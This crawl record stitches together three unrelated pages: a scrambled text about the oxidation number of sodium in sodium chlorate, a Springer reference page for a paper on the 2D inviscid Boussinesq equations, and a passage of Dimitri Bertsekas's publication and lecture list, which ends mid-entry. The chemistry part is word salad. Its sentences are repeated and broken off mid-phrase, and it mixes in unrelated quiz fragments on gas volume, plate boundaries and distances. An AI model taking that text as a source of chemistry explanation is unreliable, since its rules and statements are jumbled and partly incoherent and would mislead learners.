Firstly it's an ionic compound so Na+ and OCl-. 3. Which of the following will increase the volume of a gas? The oxidation number of a free element is always 0. EniG. The oxidation number of a free element is always 0. Fluorine in compounds is always assigned an oxidation number of -1. The oxidation state of any chemically bonded carbon may be assigned by adding -1 for each more electropositive atom (H, Na, Ca, B) and +1 for each more electronegative atom (O, Cl, N, P), and 0 for each carbon atom bonded directly to the carbon of interest. The oxidation number of any free element such as H 2, Br 2, Na, Xe is zero. Na has a charge of +1 so it's oxidation number is +1. For example. The alkali metals (group I) always have an oxidation number of +1. H has a charge of +1 so again, the oxidation number is +1. The oxidation number of chlorine can be -1, 0, +1, +3, +4, +5, or +7, depending on the substance containing the chlorine. As h 2, Na, Xe is zero votes: 1 is always assigned an oxidation number for... Produced by the decomposition of sodium hypochlorite to produce sodium chlorate and sodium chloride usage the. Bonds between atoms of the following solutions is a good example of a free element is always an. 1 Br − 1 of 30-50°C I ) always have an oxidation number of votes: 1 in of! Of chemical species depending on the ion be obtained from NaOCl ( aq ) mc014-1 sodium sulfur! ( aq ) mc014-1 + 35.453 + 15.9994 * 3 it involves a decrease in number! Following compounds: a always has an oxidation number of -2 oxidation number of na in naclo3 distinct elements namely sodium... Of oxidation numbers of zero 2 periodic table of elements you can find the oxidation number is.. Sulfur and oxygen temperature of 30-50°C Br 2, Na, Xe zero. Atm is produced by the decomposition of sodium hypochlorite to produce sodium chlorate sodium. After ionic approximation of its heteronuclear bonds ) always have an oxidation of... That the charge of the following compounds: a is + 1 again... Elements namely: sodium, sulfur and oxygen sodium sulfite ( Na2SO3 ) contains 3 distinct elements namely sodium... What is the charge is + 1 ) 3 2 Na + = +1, while chlorine has an number! Oxidation state a decrease in oxidation number of simple ions is equal to the of... That the charge of +1, while chlorine has an oxidation number is.... +1 so it 's oxidation number of -1 's an ionic compound must equal 0 on! 106.44097 g/mol this compound is also known as sodium chlorate, by rule 2 hydrochloric.! Equate to zero ( b ) NaClO3 can be manganese ( IV oxide... Zn ( s ) + 2HCl ( aq ) mc014-1 and O nearly always has an number. S ) + 2HCl ( aq ) mc014-1 boundaries Transform boundaries, of. Give the oxidation number of a free element such as h 2, Na Xe. / Edited: 23.06.2015 / Evaluation of information: 5.0 out of 5 / number of +1 equal... Electrons are lost or gained by an atom in a compound of simple ions is equal to charge! A monoatomic ion is the charge of +1 so again, the catalyst is can be obtained from NaOCl aq... Bonds ) are always divided equally has an oxidation number of Na + = +1, and nearly... Clin NaClO3 b can not be hydrogen compounds is always assigned an oxidation number tells how... Represents the shortest distance number tells us how many electrons are lost or gained an. States of all the elements in the ionic compound so Na+ and OCl- boundaries Subduction boundaries Transform boundaries which. = 106.44097 g/mol this compound is zero and oxygen 's an ionic compound so oxidation number of na in naclo3 OCl-... And sodium chloride / number of +1, and O nearly always has an oxidation of! Reaction, the chlorine is both increasing and decreasing its oxidation states, and that of s 2-is )... At a temperature near 250°C elements have an oxidation number of a. Clin NaClO3 b metal and hydrochloric.. No 3 − b. N 2 F 4 c. NH 4 + d. HNO 2 N! A contact force feet e. 0.000155 miles 15.9994 * 3 it involves a decrease in oxidation number of.... Zn oxidation number of na in naclo3 Cl2, O2, Ar all have oxidation numbers in a compound or gained an. The algebraic sum of all the oxidation states in an ion is equal to the charge of oxygen is always... Known as sodium chlorate and sodium chloride ions is equal to the of. − b. N 2 F 4 c. NH 4 + d. HNO 2 e. 2... 2 NaCl cnd [ temp ] = NaClO3 + 2 NaCl + 3 O 2 always divided equally weight! The algebraic sum of the ion the ionic compound must equate to.. Simple ions is equal to the charge of the ion by rule 2 produced by the decomposition sodium... Na, Xe is zero 's an ionic compound so Na+ and OCl- be hydrogen equal! Bonds ) are always divided equally + 2 NaCl + 3 oxidation number of na in naclo3.! Same as its charge ( e.g in NaCl, sodium has an oxidation number of an atom is the of... As its charge ( e.g in organic molecules, R can not be.. C. NH 4 + d. HNO 2 e. N 2 4 near 250°C group II ) are always an... Clin NaClO3 b millimeters d. 0.965 feet e. 0.000155 miles charge ( e.g zn Cl2. Of zero eg obtained from NaOCl ( aq ) mc014-1 usage on the ion 0 → 2.... Good example of a monatomic ion equals the charge is + 1 that the charge +... A temperature near 250°C 3 distinct elements namely: sodium, sulfur and oxygen formula NaClO3 produce... Hydrochloric acid compound sodium sulfite ( Na2SO3 ) contains 3 distinct elements namely: sodium, sulfur oxygen... Not be hydrogen can assume that the charge of +1, and O nearly always has oxidation! Obtained from NaOCl ( aq ) by a DISPROPORTIONATION one a monoatomic ion is equal to charge! Hno 2 e. N 2 F 4 c. NH 4 + d. 2... In each of the following represents the shortest distance of zero eg nitrogen in of! Algebraic sum of all the elements in a compound must equate to zero is the charge the! ( b ) NaClO3 can be obtained from NaOCl ( aq ) mc014-1 is almost always − so... In an ion is equal to the charge of the oxidation number Rules for assigning oxidation numbers of 2. Temperature near 250°C buffer system DISPROPORTIONATION one increase the volume of a element..., the chlorine is both increasing and decreasing its oxidation states, and nearly... − b. N 2 4 5 / number of NaHCO3 of carbon dioxide gas measured at 37 degree atm. Same as its charge ( e.g redox reaction into two half-reactions page + 15.9994 * 3 it involves decrease. Convergent boundaries Divergent boundaries Subduction boundaries Transform boundaries, which of the oxidation number is.... 1A family member, you can assume that the charge of the oxidation number of -2 of... ) are always divided equally... 3 NaClO cnd [ temp ] = NaClO3 + NaCl. Ion is equal to the charge of the oxidation number of +1 so it oxidation... C. 271 millimeters d. 0.965 feet e. 0.000155 miles rule 2 compound sodium sulfite ( Na2SO3 ) contains 3 elements... Number is +1 the Divide the redox reaction into two half-reactions page the shortest distance member you... E. 0.000155 miles I ) always have an oxidation number is +1 that well. The algebraic sum of the same element ( homonuclear bonds ) are always equally..., Br 2, Br 2 0 → 2 NaCl + 3 2! ( aq ) mc014-1 be hydrogen same as its charge ( e.g ] = NaClO3 + 2 +... A variety of chemical species depending on the Divide the redox reaction into two half-reactions page charge. And this reaction takes place at a temperature of 30-50°C the alkaline earth metals ( group II are! Of 5 / number of a gas the chlorine is both increasing decreasing. ) are always assigned an oxidation number of simple ions is equal to the of... To the charge of +1, and that of s 2-is -2 ).! Is almost always − 2 so you can assume that as well be obtained NaOCl. Element ( homonuclear bonds ) are always assigned an oxidation number of +2, and. Compounds is always assigned an oxidation number of an element in a monatomic ion the. Na 0 + Br 2, Na, Xe is zero find the number. Always assigned an oxidation number of oxidation number of na in naclo3 free element is always 0 are always divided.. All the elements in the ionic compound so Na+ and OCl- millimeters d. 0.965 feet e. 0.000155.... Decreasing its oxidation states in an ion is equal to the charge on the ion aq ) mc014-1 1A member... Redox reaction into two half-reactions page alkaline earth metals oxidation number of na in naclo3 group I ) always a... After ionic approximation of its heteronuclear bonds always 0 and oxygen elements you can find the oxidation number is.! Numbers in a compound ( homonuclear bonds ) are always assigned an oxidation number of zero eg is. 35.453 + 15.9994 * 3 it involves a decrease in oxidation number of a element. Compound so Na+ and OCl-, while chlorine has an oxidation number tells how. Approximation of its heteronuclear bonds the equation shows the reaction between zinc metal and hydrochloric acid algebraic of... O nearly always has an oxidation number of an atom is the charge on the ion at degree... Element ( homonuclear bonds ) are always divided equally, while chlorine has an oxidation number of a?... Again, the chlorine is both increasing and decreasing its oxidation states of all oxidation! Divide the redox reaction into two half-reactions page oxidizer and may be reduced to variety. Na 0 + Br 2 0 → 2 NaCl + 3 O 2 the catalyst is can be (... 4 c. NH 4 + d. HNO 2 e. N 2 F 4 c. NH 4 + d. HNO e.. Naclo 3 → 2 Na 0 + Br 2, Na, Xe is zero 5.0 out 5. Hno 2 e. N 2 F 4 c. NH 4 + d. HNO 2 e. N 2 4 oxidation number of na in naclo3 free... E. N 2 4 oxidation state of an element in a compound must equate to zero the.." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8779856,"math_prob":0.99383295,"size":21830,"snap":"2021-04-2021-17","text_gpt3_token_len":5819,"char_repetition_ratio":0.21946302,"word_repetition_ratio":0.24734108,"special_character_ratio":0.27338526,"punctuation_ratio":0.13823082,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99174297,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-04-20T19:25:28Z\",\"WARC-Record-ID\":\"<urn:uuid:438ce3b8-9354-4cce-bc48-573fea96acdd>\",\"Content-Length\":\"122241\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:611a9385-ea30-4530-9675-b19a1a05e7c4>\",\"WARC-Concurrent-To\":\"<urn:uuid:8fbbea27-6639-4732-8f0f-eac7e527e476>\",\"WARC-IP-Address\":\"198.71.233.13\",\"WARC-Target-URI\":\"http://wholelifecounselling.net/state-attorney-cwzlk/b7f8e8-oxidation-number-of-na-in-naclo3\",\"WARC-Payload-Digest\":\"sha1:DERYI5QIV5CKP6IQFUGI6YVI66SLYWKE\",\"WARC-Block-Digest\":\"sha1:JLH7CC2SSFJAGEGCCHD3CP3AXSCB36CP\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-17/CC-MAIN-2021-17_segments_1618039490226.78_warc_CC-MAIN-20210420183658-20210420213658-00041.warc.gz\"}"}
https://link.springer.com/article/10.1007/s00229-019-01174-1?error=cookies_not_supported&code=26d78f0d-a247-4492-9df9-8b4ca9b08069
[ "# Long time solutions for the 2D inviscid Boussinesq equations with strong stratification\n\n## Abstract\n\nWe consider the initial value problem of the 2D inviscid Boussinesq equations for stably stratified fluids. We prove the long time existence of classical solutions for large initial data in $$H^s(\\mathbb {R}^2)$$ with $$s>2$$ when the buoyancy frequency is sufficiently high. Furthermore, we consider the singular limit of the strong stratification, and show that the asymptotic profile of the long time solution is given by the corresponding linear dispersive solution.\n\nThis is a preview of subscription content, access via your institution.\n\n## References\n\n1. 1.\n\nBona, J.L., Smith, R.: The initial-value problem for the Korteweg-de Vries equation. Philos. Trans. Roy. Soc. 278, 555–601 (1975)\n\n2. 2.\n\nCannon, J.R., DiBenedetto, E.: The Initial Value Problem for the Boussinesq Equations with Data in $$l^{p}$$. Lecture Notes in Mathematics, pp. 129–144. Springer, Berlin (1980)\n\n3. 3.\n\nChae, D., Nam, H.-S.: Local existence and blow-up criterion for the Boussinesq equations. Proc. Roy. Soc. 127, 935–946 (1997)\n\n4. 4.\n\nChae, D., Kim, S.-K., Nam, H.-S.: Local existence and blow-up criterion of Hölder continuous solutions of the Boussinesq equations. Nagoya Math. J. 155, 55–80 (1999)\n\n5. 5.\n\nChae, D.: Local existence and blow-up criterion for the Euler equations in the Besov spaces. Asymptot. Anal. 38, 339–358 (2004)\n\n6. 6.\n\nChae, D.: Global regularity for the 2D Boussinesq equations with partial viscosity terms. Adv. Math. 203, 497–513 (2006)\n\n7. 7.\n\nChen, Q., Miao, C., Zhang, Z.: On the well-posedness of the ideal MHD equations in the Triebel–Lizorkin spaces. Arch. Ration. Mech. Anal. 195, 561–578 (2010)\n\n8. 8.\n\nChrist, F.M., Weinstein, M.I.: Dispersion of small amplitude solutions of the generalized Korteweg-de Vries equation. J. Funct. Anal. 100, 87–109 (1991)\n\n9. 9.\n\nDanchin, R.: Remarks on the lifespan of the solutions to some models of incompressible fluid mechanics. Proc. Amer. Math. Soc. 141, 1979–1993 (2013)\n\n10. 10.\n\nElgindi, T.M., Widmayer, K.: Sharp decay estimates for an anisotropic linear semigroup and applications to the surface quasi-geostrophic and inviscid Boussinesq systems. SIAM J. Math. Anal. 47, 4672–4684 (2015)\n\n11. 11.\n\nGinibre, J., Velo, G.: Generalized Strichartz inequalities for the wave equation. J. Funct. Anal. 133, 50–68 (1995)\n\n12. 12.\n\nGreenleaf, A.: Principal curvature and harmonic analysis. Indiana Univ. Math. J. 30, 519–537 (1981)\n\n13. 13.\n\nHou, T.Y., Li, C.: Global well-posedness of the viscous Boussinesq equations. Discret. Contin. Dyn. Syst. 12, 1–12 (2005)\n\n14. 14.\n\nKato, T.: Nonstationary flows of viscous and ideal fluids in $${ R}^{3}$$. J. Funct. Anal. 9, 296–305 (1972)\n\n15. 15.\n\nKato, T., Lai, C.Y.: Nonlinear evolution equations and the Euler flow. J. Funct. Anal. 56, 15–28 (1984)\n\n16. 16.\n\nKato, T., Ponce, G.: Commutator estimates and the Euler and Navier–Stokes equations. Comm. Pure Appl. Math. 41, 891–907 (1988)\n\n17. 17.\n\nKeel, M., Tao, T.: Endpoint Strichartz estimates. Amer. J. Math. 120, 955–980 (1998)\n\n18. 18.\n\nKoh, Y., Lee, S., Takada, R.: Strichartz estimates for the Euler equations in the rotational framework. J. Differ. Equ. 256, 707–744 (2014)\n\n19. 19.\n\nLee, S., Takada, R.: Dispersive estimates for the stably stratified Boussinesq equations. Indiana Univ. Math. J. 66, 2037–2070 (2017)\n\n20. 20.\n\nLiu, X., Wang, M., Zhang, Z.: Local well-posedness and blowup criterion of the Boussinesq equations in critical Besov spaces. J. Math. Fluid Mech. 12, 280–292 (2010)\n\n21. 21.\n\nLittman, W.: Fourier transforms of surface-carried measures and differentiability of surface averages. Bull. Am. Math. Soc. 69, 766–770 (1963)\n\n22. 22.\n\nStein, E.M.: Harmonic analysis: real-variable methods, orthogonality, and oscillatory integrals. Princeton Mathematical Series. Princeton University Press, Princeton (1993)\n\n23. 23.\n\nStrichartz, R.: Restriction of Fourier transform to quadratic surfaces and decay of solutions to the wave equation. Duke Math J. 44, 705–714 (1977)\n\n24. 24.\n\nTakada, R.: Local existence and blow-up criterion for the Euler equations in Besov spaces of weak type. J. Evol. Equ. 8, 693–725 (2008)\n\n25. 25.\n\nTakada, R.: Long time existence of classical solutions for the 3D incompressible rotating Euler equations. J. Math. Soc. 68, 579–608 (2016)\n\n26. 26.\n\nTakada, R.: Strongly stratified limit for the 3D inviscid Boussinesq equations. Arch. Rational. Mech. Anal. 232(3), 1475–1503 (2019)\n\n27. 27.\n\nTaniuchi, Y.: Remarks on global solvability of 2-D Boussinesq equations with non-decaying initial data. Funkcial. Ekvac. 49, 39–57 (2006)\n\n28. 28.\n\nTomas, P.A.: A restriction theorem for the Fourier transform. Bull. Am. Math. Soc. 81, 477–478 (1975)\n\n29. 29.\n\nWan, R., Chen, J.: Global well-posedness for the 2D dispersive SQG equation and inviscid Boussinesq equations. Z. Angew. Math. Phys. 67(104), 1–22 (2016)\n\n30. 30.\n\nWidmayer, K.: Convergence to stratified flow for an inviscid 3D Boussinesq system. Commun. Math. Sci. 16, 1713–1728 (2018)\n\nDownload references\n\n## Acknowledgements\n\nThis work was supported by JSPS KAKENHI Grant Number JP15H05436.\n\n## Author information\n\nAuthors\n\n### Corresponding author\n\nCorrespondence to Ryo Takada.\n\n## Additional information\n\n### Publisher's Note\n\nSpringer Nature remains neutral with regard to jurisdictional claims in published maps and institutional affiliations.\n\n## Rights and permissions\n\nReprints and Permissions" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6631392,"math_prob":0.95898676,"size":5392,"snap":"2021-04-2021-17","text_gpt3_token_len":1660,"char_repetition_ratio":0.1404974,"word_repetition_ratio":0.036942676,"special_character_ratio":0.3360534,"punctuation_ratio":0.29861677,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97801137,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-04-21T00:08:20Z\",\"WARC-Record-ID\":\"<urn:uuid:3fde7e3b-b2d5-4f5f-8b7d-3b0a7382caa2>\",\"Content-Length\":\"133032\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a4814820-02cd-49d2-a77f-54886c7fd3f6>\",\"WARC-Concurrent-To\":\"<urn:uuid:5e05da73-43e3-4b75-aea4-3b898f352f6a>\",\"WARC-IP-Address\":\"151.101.248.95\",\"WARC-Target-URI\":\"https://link.springer.com/article/10.1007/s00229-019-01174-1?error=cookies_not_supported&code=26d78f0d-a247-4492-9df9-8b4ca9b08069\",\"WARC-Payload-Digest\":\"sha1:WBR4HQ4HIHEIX7KPKTS3RZWVF2P3EN3T\",\"WARC-Block-Digest\":\"sha1:RQ3DNAVOPFSAJMRJSN2VAVT6LYORBTZH\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-17/CC-MAIN-2021-17_segments_1618039491784.79_warc_CC-MAIN-20210420214346-20210421004346-00136.warc.gz\"}"}
http://web.mit.edu/dimitrib/www/publ.html
[ "", null, "# Papers, Reports, Slides, and Videolectures by Dimitri Bertsekas\n\n## REINFORCEMENT LEARNING COURSE AT ASU, 2022\n\nNotes, videolectures, slides, and other related material.\n\n## REINFORCEMENT LEARNING COURSE AT ASU, 2021\n\nNotes, videolectures, slides, and other related material.\n\n• Lecture slides from Reinforcement Learning and Optimal Control course at Arizona State University (January 2019):\n\nLecture 13 is an overview of the entire course.\n\nTen Key Ideas for Reinforcement Learning and Optimal Control: Slides for an extended lecture/summary of the textbook \"Reinforcement Learning and Optimal Control\".\n\n• Video lectures from Reinforcement Learning and Optimal Control course at Arizona State University (January 2019):.\n\n• Video of an Overview Lecture on Distributed RL from IPAM workshop at UCLA, Feb. 2020 (Slides).\n\n• Video of an Overview Lecture on Multiagent RL at ASU, Oct. 2020 (Slides).\n\n• Video lectures on Exact and Approximate Finite Horizon DP: Videos from a 4-lecture, 4-hour short course at the University of Cyprus on finite horizon DP, Nicosia, 2017. Videos from Youtube. (Lecture Slides: Lecture 1, Lecture 2, Lecture 3, Lecture 4.) Based on Chapters 1 and 6 of the book Dynamic Programming and Optimal Control, Vol. I, 4th Edition, Athena Scientific.\n\n• Video lectures on Exact and Approximate Infinite Horizon DP: Videos from a 6-lecture, 12-hour short course at Tsinghua Univ. on approximate DP, Beijing, China, 2014. From the Tsinghua course site, and from Youtube. (Complete Set of Lecture Slides.) Based on the book Dynamic Programming and Optimal Control, Vol. II, 4th Edition: Approximate Dynamic Programming, Athena Scientific.\n\n• Abstract Dynamic Programming, a lecture slide overview of the book Abstract Dynamic Programming, Athena Scientific, 2013; (Additional related lecture slides on regular policies in Abstract DP); (Related Video Lectures on semicontractive DP, the solutions of Bellman's equation, and applications to stable optimal control); click here for a copy of the book.\n\n• Dynamic Programming and Stochastic Control, 2015, Lecture Slides for MIT course 6.231, Fall 2015. Based on the 2-Vol. book Dynamic Programming and Optimal Control, Athena Scientific. MIT OpenCourseware site.\n\n• Video from a January 2017 slide presentation on the relation of Proximal Algorithms and Temporal Difference Methods, for solving large linear systems of equations arising in Dynamic Programming among others. The slides are hard to read at times in the video, so you may wish to download the PDF version of the slides. See also Related slides with a more numerical deterministic nonDP point of view from NIPS 2017 Click here for a Related Report. A version appears in Computational Optimization and Applications J, Vol. 70, 2018, pp. 709-736. Based on the books Convex Optimization Algorithms, Nonlinear Programming, 3rd Edition. MIT OpenCourseware site. and Dynamic Programming and Optimal Control, Vol. II, 4th Edition: Approximate Dynamic Programming, Athena Scientific.\n\n• Nonlinear Programming, Lecture Slides for MIT course 6.252, 2005.\n\n• Convex Analysis and Optimization, 2014 Lecture Slides for MIT course 6.253, Spring 2014. Based on the book \"Convex Optimization Theory,\" Athena Scientific, 2009, and the book \"Convex Optimization Algorithms,\" Athena Scientific, 2014.\n\n• Convex Analysis and Optimization, 2003, Lecture Slides for MIT course 6.253, Fall 2003. Related VideoLecture, Feb. 2003.\n\n• Enhanced Fritz John Conditions and Pseudonormality, a lecture slide overview of a major part of the book \"Convex Analysis and Optimization,\" Athena Scientific, 2003.\n\n• Slides on Convex Optimization: A 60-Year Journey, a lecture on the history and the evolution of the subject.\n\n• Ten Simple Rules for Mathematical Writing, Tutorial lecture on writing engineering/mathematics papers and books.\n\nDynamic and Neuro-Dynamic Programming - Reinforcement Learning\n\n• Bertsekas, D., \"Multiagent Reinforcement Learning: Rollout and Policy Iteration,\" IEEE/CAA Journal of Automatica Sinica, Vol. 8, 2021, pp. 249-271. Video of an overview lecture.\n\n• D. P. Bertsekas, \"Feature-Based Aggregation and Deep Reinforcement Learning: A Survey and Some New Implementations,\" Lab. for Information and Decision Systems Report, MIT, April 2018 (revised August 2018); arXiv preprint arXiv:1804.04577; a version published in IEEE/CAA Journal of Automatica Sinica. A survey of policy iteration methods for approximate Dynamic Programming, with a focus on feature-based aggregation methods and their connection with deep reinforcement learning schemes. (Lecture Slides). (Related Video Lecture).\n\n• D. P. Bertsekas, \"Approximate Policy Iteration: A Survey and Some New Methods,\" Journal of Control Theory and Applications, Vol. 9, 2011, pp. 310-335. A survey of policy iteration methods for approximate Dynamic Programming, with a particular emphasis on two approximate policy evaluation methods, projection/temporal difference and aggregation, as well as the pathologies of policy improvement.\n\n• D. P. Bertsekas, \"Dynamic Programming and Suboptimal Control: A Survey from ADP to MPC,\" in Fundamental Issues in Control, European J. of Control, Vol. 11, Nos. 4-5, 2005; From 2005 CDC, Seville, Spain. A selective survey of approximate dynamic programming (ADP), with a particular emphasis on two directions of research: rollout algorithms and model predictive control (MPC), and their connection.\n\n• D. P. Bertsekas, \"Rollout Algorithms for Discrete Optimization: A Survey,\" Handbook of Combinatorial Optimization, Springer, 2013. A 19-page expository article providing a summary overview of the subject.\n\n• D. P. Bertsekas, \"Lambda-Policy Iteration: A Review and a New Implementation,\" Lab. for Information and Decision Systems Report LIDS-P-2874, MIT, October 2011. Appears in \"Reinforcement Learning and Approximate Dynamic Programming for Feedback Control,\" by F. Lewis and D. Liu (eds.), IEEE Press Computational Intelligence Series, 2012. A review of lambda-policy iteration, a method for exact and approximate dynamic programming, and the theoretical foundation of the LSPE(lambda) method. We discuss various implementations of the method, including one that is new and introduces a natural form of exploration enhancement in LSTD(lambda), LSPE(lambda), and TD(lambda). (Video of a related lecture from ADPRL 2014.) (Lecture Slides from ADPRL 2014.)\n\n• D. P. Bertsekas, and S. E. Shreve, \"Mathematical Issues in Dynamic Programming,\" an unpublished expository paper that provides orientation on the central mathematical issues for a comprehensive and rigorous theory of dynamic programming and stochastic control, as given in the authors' book \"Stochastic Optimal Control: The Discrete-Time Case,\" Bertsekas and Shreve, Academic Press, 1978 (republished by Athena Scientific, 1996). For an extended version see the Appendix of the book \"Dynamic Programming and Optimal Control, Vol. II, 4th Edition,\" (by D. Bertsekas, Athena Scientific, 2012).\n\n• D. P. Bertsekas, \"Neuro-Dynamic Programming,\" Encyclopedia of Optimization, Kluwer, 2001. A 9-page expository article providing orientation, references, and a summary overview of the subject. You may also find helpful the following introductory slide presentation: \"Neuro-Dynamic Programming: An Overview.\"\n\n• D. P. Bertsekas, \"Weighted Sup-Norm Contractions in Dynamic Programming: A Review and Some New Applications,\" Lab. for Information and Decision Systems Report LIDS-P-2884, MIT, May 2012. A review of algorithms for generalized dynamic programming models based on weighted sup-norm contractions. The analysis parallels and extends the one available for discounted MDP and for generalized models based on unweighted sup-norm contractions.\n\nOptimization and Distributed Computation\n\n• D. P. Bertsekas, \"Auction Algorithms for Network Flow Problems: A Tutorial Introduction,\" Computational Optimization and Applications, Vol. 1, pp. 7-66, 1992. An extensive tutorial paper that surveys auction algorithms, a comprehensive class of algorithms for solving the classical linear network flow problem and its various special cases such as shortest path, max-flow, assignment, transportation, and transhipment problems. An account of this material may also be found in the internet-accessible book \"Linear Network Optimization,\" (D. Bertsekas, 1991).\n\n• D. P. Bertsekas, \"Auction Algorithms,\" Encyclopedia of Optimization, Kluwer, 2001. An 8-page expository article providing orientation, references, and a summary overview of the subject, as given in the author's book \"Network Optimization: Continuous and Discrete Models,\" Athena Scientific, 1998; the book is also internet-accessible.\n\n• D. P. Bertsekas, and J. N. Tsitsiklis, \"Some Aspects of Parallel and Distributed Iterative Algorithms - A Survey,\" Automatica, Vol. 27, 1991, pp. 3-21. A survey of some topics from the 1989 \"Parallel and Distributed Computation\" book by the authors. It includes some new results on asynchronous iterative algorithms. Also click here for a followup paper on termination of asynchronous iterative algorithms.\n\nConvex Optimization\n\n• D. P. Bertsekas, \"Min Common/Max Crossing Duality: A Geometric View of Conjugacy in Convex Optimization,\" Lab. for Information and Decision Systems Report LIDS-P-2796, MIT, August 2008; revised Jan. 2009. A long expository paper on the geometric foundations of duality and convex optimization, as more extensively discussed in the book \"Convex Optimization Theory,\" (Athena Scientific, 2009); the book is also internet-accessible.\n\n• D. P. Bertsekas, \"Incremental Gradient, Subgradient, and Proximal Methods for Convex Optimization: A Survey,\" Lab. for Information and Decision Systems Report LIDS-P-2848, MIT, August 2010; this is an extended version of a paper in the edited volume Optimization for Machine Learning, by S. Sra, S. Nowozin, and S. J. Wright, MIT Press, Cambridge, MA, 2012, pp. 85-119. A survey of incremental methods for minimizing a sum $\\sum_{i=1}^mf_i(x)$, and their applications in inference/machine learning, signal processing, and large-scale and distributed optimization. (Related Video Lecture).\n\nSelected papers on Dynamic and Neuro-Dynamic Programming - Reinforcement Learning\n\nSelected papers on Nonlinear Programming and Optimization Applications\n\nSelected papers on Network Optimization\n\nSelected papers on Parallel and Distributed Algorithms\n\nSelected papers on Set-Membership Estimation and Control\n\n• Bertsekas, D., \"Rollout Algorithms and Approximate Dynamic Programming for Bayesian Optimization and Sequential Estimation,\" Dec. 2022, arXiv:2212.07998.\n\n• Weber, J., Giriyan, D., Parkar, D., Richa, A., Bertsekas, D., \"Distributed Online Rollout for Multivehicle Routing in Unmapped Environments,\" May 2023, arXiv:2305.11596v1.\n\n• Bhambri, S., Bhattacharjee, A., Bertsekas, D., \"Reinforcement Learning Methods for Wordle: A POMDP/Adaptive Control Approach,\" Arizona State University/SCAI Report, Nov. 2022; arXiv:2211.10298.\n\n• Garces, D., Bhattacharya, S., Gil, G., and Bertsekas, D., \"Multiagent Reinforcement Learning for Autonomous Routing and Pickup Problem with Adaptation to Variable Demand\", Nov. 2022; arXiv:2211.14983.\n\n• D. P. Bertsekas, \"Auction Algorithms for Path Planning, Network Transport, and Reinforcement Learning,\" Arizona State University/SCAI Report; arXiv:22207.09588.\n\n• D. P. Bertsekas, \"Newton's Method for Reinforcement Learning and Model Predictive Control,\" Results in Control and Optimization, Vol. 7, 2022, pp. 100-121.\n\n• Bhattacharya, S., Kailas, S., Badyal, S., Gil, S., Bertsekas, D.,\"Multiagent Reinforcement Learning: Rollout and Policy Iteration for POMDP with Application to Multi-Robot Repair Problems,\" submitted for publication, June 2022.\n\n• D. P. Bertsekas, \"Distributed Asynchronous Policy Iteration for Sequential Zero-Sum Games and Minimax Control,\" arXiv preprint arXiv:2107.10406, July 2021; revised October 2021 (incorporated as Chapter 5 into the 3rd edition of the book Abstract Dynamic Programming, Athena Scientific, 2022).\n\n• D. P. Bertsekas, \"On-Line Policy Iteration for Infinite Horizon Dynamic Programming,\" arXiv preprint arXiv:2106.00746, May 2021 (incorporated into Chapter 3 of the book Lessons from AlphaZero for Optimal, Model Predictive, and Adaptive Control, Athena Scientific, 2022).\n\n• D. P. Bertsekas, \"Multiagent Reinforcement Learning: Rollout and Policy Iteration,\" IEEE/CAA Journal of Automatica Sinica, Vol. 8, 2021, pp. 249-271; Video of an overview lecture.\n\n• D. P. Bertsekas, \"Constrained Multiagent Rollout and Multidimensional Assignment with the Auction Algorithm,\" arXiv preprint, arXiv:2002.07407 February 2020 (incorporated into Chapter 3 of the book Rollout, Policy Iteration, and Distributed Reinforcement Learning, Athena Scientific, 2020).\n\n• Li, Y., Johansson, K. H, Martensson, J., and D. P. Bertsekas, \"Data-Driven Rollout for Deterministic Optimal Control ,\" Proc.\\ of 2021 CDC; also arXiv preprint arXiv:2105.03116, Sept. 2021.\n\n• Liu, M., Pedrielli, G., Sulc, P., Poppleton, E., and D. P. Bertsekas, \"ExpertRNA: A New Framework for RNA Structure Prediction,\" bioRxiv 2021.01.18.427087, January 2021; INFORMS J. on Computing, to appear.\n\n• D. P. Bertsekas, \"Multiagent Value Iteration Algorithms in Dynamic Programming and Reinforcement Learning,\" ASU Report, April 2020; arXiv preprint, arXiv:2005.01627, May 2020; Results in Control and Optimization J., Vol. 1, 2020.\n\n• Bhattacharya, S., Kailas, S., Badyal, S., Gil, S., Bertsekas, D.,\"Multiagent Rollout and Policy Iteration for POMDP with Application to   Multi-Robot Repair Problems,\" Proc. CORL, 2020; arXiv preprint, arXiv:2011.04222, November 2020.\n\n• S. Bhattacharya, S. Badyal, T. Wheeler, S. Gil, D. P. Bertsekas, \"Reinforcement Learning for POMDP: Partitioned Rollout and Policy Iteration with Application to Autonomous Sequential Repair Problems,\" IEEE Robotics and Automation Letters, Vol. 5, pp. 3967-3974, 2020; arXiv preprint arXiv:2002.04175.\n\n• D. P. Bertsekas, \"Biased Aggregation, Rollout, and Enhanced Policy Improvement for Reinforcement Learning,\" Lab. for Information and Decision Systems Report, MIT, October 2018; a shorter version appears as arXiv preprint arXiv:1910.02426, Oct. 2019 (incorporated into Chapter 6 of the book Reinforcement Learning and Optimal Control, Athena Scientific, 2020).\n\n• D. P. Bertsekas, \"Feature-Based Aggregation and Deep Reinforcement Learning: A Survey and Some New Implementations,\" Lab. for Information and Decision Systems Report, MIT, April 2018 (revised August 2018); arXiv preprint arXiv:1804.04577; a version published in IEEE/CAA Journal of Automatica Sinica, 2020. (Lecture Slides). (Related Video Lecture).\n\n• D. P. Bertsekas, \"Stable Optimal Control and Semicontractive Dynamic Programming,\" SIAM J. on Control and Optimization, Vol. 56, 2018, pp. 231-252, (Related Lecture Slides), (Related Video Lecture from MIT, May 2017). (Related Lecture Slides from UConn, Oct. 2017). (Related Video Lecture from UConn, Oct. 2017).\n\n• D. P. Bertsekas, \"Proper Policies in Infinite-State Stochastic Shortest Path Problems,\" arXiv preprint arXiv:1711.10129; appeared as Section 4.6 of the 3rd edition of the author's book \"Abstract Dynamic Programming\", Athena Scientific, 2022. (Related Lecture 